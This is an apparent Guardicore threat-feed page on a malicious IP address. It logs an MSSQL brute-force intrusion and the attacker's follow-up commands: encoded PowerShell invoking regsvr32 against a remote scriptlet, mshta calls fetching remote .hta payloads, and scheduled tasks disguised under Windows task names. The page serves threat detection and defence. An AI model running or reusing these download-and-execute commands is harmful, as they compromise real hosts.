IP Address: 185.10.68.147Malicious

Weekly Summary

Browse or download a weekly review of our cyber threat intelligence data and gain more insight to help protect your network

Top Threats

Cyber Threat Intelligence

Discover Malicious IPs and Domains with Guardicore Cyber Threat Feed

IP Address:
185.10.68.147​
Malicious

This IP address attempted an attack on a machine protected by Guardicore Centra

Threat Information

Role

Attacker, Connect-Back, Scanner

Services Targeted

MSSQL HTTP

Tags

Successful MSSQL Login DNS Query MSSQL Execute MsSql Shell Command Service Deletion CMD Service Configuration Outgoing Connection Scheduled Task Creation MSSQL Brute Force PowerShell Service Creation Access Suspicious Domain

Associated Attack Servers

github.com ovo.sc eu.minerpool.pw raw.githubusercontent.com openportstats.com secureserver.net infinity-hosting.com ctldl.windowsupdate.com 80.82.77.221 coasttickets.com apps.identrust.com

185.199.108.133 13.92.155.19 199.232.28.133 40.77.30.74 147.135.116.65 80.82.77.221 185.199.111.133 107.180.50.222 52.165.231.208 185.199.109.133 104.47.157.45

Basic Information

IP Address

185.10.68.147

Domain

-

ISP

Flokinet Ltd

Country

Seychelles

WHOIS

Created Date

-

Updated Date

-

Organization

-

First seen in Guardicore Centra

2019-06-24

Last seen in Guardicore Centra

2021-03-20

What is Guardicore Centra
Guardicore Centra is a data center and cloud security solution that protects the organization's core assets, using flexible, quickly deployed and easy to understand micro-segmentation controls. Centra generates in-context security incidents, with details on attacker tools and techniques, that help IR teams prioritize incident investigation and reduce dwell time. Learn More

Attack Flow

A user logged in using MSSQL with the following credentials: toor / ***** - Authentication policy: White List (Part of a Brute Force Attempt)

Successful MSSQL Login MSSQL Brute Force

A user logged in using MSSQL with the following credentials: root / **** - Authentication policy: White List (Part of a Brute Force Attempt)

Successful MSSQL Login MSSQL Brute Force

A user logged in using MSSQL with the following credentials: mysql / **** - Authentication policy: White List (Part of a Brute Force Attempt)

Successful MSSQL Login MSSQL Brute Force

MSSQL executed 1 shell commands

Execute MsSql Shell Command

PowerShell session started by c:\windows\system32\windowspowershell\v1.0\powershell.exe 3 times

Process c:\windows\system32\windowspowershell\v1.0\powershell.exe attempted to access suspicious domains: coasttickets.com, ctldl.windowsupdate.com, ovo.sc and raw.githubusercontent.com

Outgoing Connection DNS Query Access Suspicious Domain

Process c:\windows\system32\windowspowershell\v1.0\powershell.exe generated outgoing network traffic to: 107.180.50.222:443, 185.10.68.147:443, 185.10.68.147:80 and 199.232.28.133:443

Outgoing Connection

The command line cmd /c powershell -nop -noni -w 1 -enc cgBlAGcAcwB2AHIAMwAyACAALwB1ACAALwBzACAALwBpADoAaAB0AHQAcAA6AC8ALwAxADgANQAuADEAMAAuADYAOAAuADEANAA3AC8AdwBpAG4ALwBwAGgAcAAvAGYAdQBuAGMALgBwAGgAcAAgAHMAYwByAG8AYgBqAC4AZABsAGwA was scheduled to run by modifying C:\Windows\System32\Tasks\Microsoft\Windows\.NET Framework\.NET Framework Cache Optimization

Process c:\windows\system32\windowspowershell\v1.0\powershell.exe attempted to access domains: apps.identrust.com

DNS Query

The command line C:\ProgramData\Oracle\Java\java.exe was scheduled to run by modifying C:\Windows\System32\Tasks\Microsoft\Windows\Bluetooth\UpdateDeviceTask

The command line C:\Windows\System32\cmd.exe /c mshta http://185.10.68.147/win/update.hta was scheduled to run by modifying C:\Windows\System32\Tasks\Microsoft\Windows\Shell\WindowsShellUpdate

The command line C:\Windows\System32\cmd.exe /c mshta http://185.10.68.147/win/checking.hta was scheduled to run by modifying C:\Windows\System32\Tasks\Microsoft\Windows\Shell\WinShell

The command line C:\Windows\System32\cmd.exe /c mshta http://qlqd5zqefmkcr34a.onion.sh/win/checking.hta was scheduled to run by modifying C:\Windows\System32\Tasks\Microsoft\Windows\UPnP\UPnPHost

The command line C:\Windows\System32\cmd.exe /c mshta https://asq.d6shiiwz.pw/win/hssl/d6.hta was scheduled to run by modifying C:\Windows\System32\Tasks\Microsoft\Windows\UPnP\UPnPClient Task

The command line C:\Windows\System32\cmd.exe /c mshta http://asq.r77vh0.pw/win/checking.hta was scheduled to run by modifying C:\Windows\System32\Tasks\Microsoft\Windows\EDP\EDP App Lock Task

The command line C:\Windows\System32\cmd.exe /c mshta https://asq.r77vh0.pw/win/hssl/r7.hta was scheduled to run by modifying C:\Windows\System32\Tasks\Microsoft\Windows\EDP\EDP App Update Cache

The command line C:\Windows\System32\cmd.exe /c mshta http://asd.s7610rir.pw/win/checking.hta was scheduled to run by modifying C:\Windows\System32\Tasks\Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.50319 Critical

The command line C:\Windows\System32\cmd.exe /c mshta https://asd.s7610rir.pw/win/checking.hta was scheduled to run by modifying C:\Windows\System32\Tasks\Microsoft\Windows\DiskCleanup\SlientDefragDisks

The command line C:\Windows\System32\cmd.exe /c schtasks /tn \Microsoft\Windows\Bluetooth\UpdateDeviceTask /run was scheduled to run by modifying C:\Windows\System32\Tasks\Microsoft\Windows\Registry\RegBackup

The command line C:\Windows\System32\cmd.exe /c C:\Windows\Fonts\sasd.bat was scheduled to run by modifying C:\Windows\System32\Tasks\Microsoft\Windows\MobilePC\DetectPC

The command line cmd /c powershell -nop -noni -w 1 -enc cgBlAGcAcwB2AHIAMwAyACAALwB1ACAALwBzACAALwBpADoAaAB0AHQAcABzADoALwAvAGEAcwBxAC4AcgA3ADcAdgBoADAALgBwAHcALwB3AGkAbgAvAHAAaABwAC8AZgB1AG4AYwAuAHAAaABwACAAcwBjAHIAbwBiAGoALgBkAGwAbAA= was scheduled to run by modifying C:\Windows\System32\Tasks\Microsoft\Windows\.NET Framework\.NET Framework Cache Optimization Files-S-3-5-21-2236678155-433529325-2142214968-1138

The command line cmd /c powershell -nop -noni -w 1 -enc cgBlAGcAcwB2AHIAMwAyACAALwB1ACAALwBzACAALwBpADoAaAB0AHQAcABzADoALwAvAGEAcwBxAC4AZAA2AHMAaABpAGkAdwB6AC4AcAB3AC8AdwBpAG4ALwBwAGgAcAAvAGYAdQBuAGMALgBwAGgAcAAgAHMAYwByAG8AYgBqAC4AZABsAGwA was scheduled to run by modifying C:\Windows\System32\Tasks\Microsoft\Windows\.NET Framework\.NET Framework Cache Optimization Files-S-3-5-21-2236678156-433529325-2142214268-1138

The command line cmd /c powershell -nop -noni -w 1 -enc cgBlAGcAcwB2AHIAMwAyACAALwB1ACAALwBzACAALwBpADoAaAB0AHQAcABzADoALwAvAGEAcwBkAC4AcwA3ADYAMQAwAHIAaQByAC4AcAB3AC8AdwBpAG4ALwBwAGgAcAAvAGYAdQBuAGMALgBwAGgAcAAgAHMAYwByAG8AYgBqAC4AZABsAGwA was scheduled to run by modifying C:\Windows\System32\Tasks\Microsoft\Windows\RamDiagnostic\Error Diagnostic

c:\windows\system32\services.exe installed cmd as a service named cli_optimization_v2.0.55727_64 under service group None

Service Creation

c:\windows\system32\services.exe installed cmd as a service named cli_optimization_v2.0.55727_32 under service group None

Service Creation

The command line C:\Windows\System32\cmd.exe /c powershell -exec bypass C:\Windows\Fonts\del.ps1 was scheduled to run by modifying C:\Windows\System32\Tasks\Microsoft\Windows\MUI\LPupdate

Process c:\windows\system32\windowspowershell\v1.0\powershell.exe generated outgoing network traffic to: 185.10.68.147:80

Outgoing Connection

Process c:\windows\system32\windowspowershell\v1.0\powershell.exe attempted to access suspicious domains: ovo.sc

Outgoing Connection Access Suspicious Domain

Connection was closed due to user inactivity

Process system performed bulk changes in {c:} on 71 files

Bulk Files Tampering

Process c:\windows\system32\windowspowershell\v1.0\powershell.exe performed bulk changes in {c:\users\administrator\appdata\local\microsoft\windows\powershell\commandanalysis} on 59 files

Bulk Files Tampering

Process c:\windows\system32\windowspowershell\v1.0\powershell.exe performed bulk changes in {c:\windows\system32\config\systemprofile\appdata\local\microsoft\windows\powershell\commandanalysis} on 50 files

Bulk Files Tampering

Associated Files

/tmp/yarn.sh

SHA256: 3778e3a2937b63746728f6cb5434217f6b44f00ef148a4afc75aa665d275ef21

2063 bytes

Oops! - Do you see your IP here? Contact us at labs@guardicore.com to remove it from the Threat Intelligence data.

IP Address: 185.10.68.147​Malicious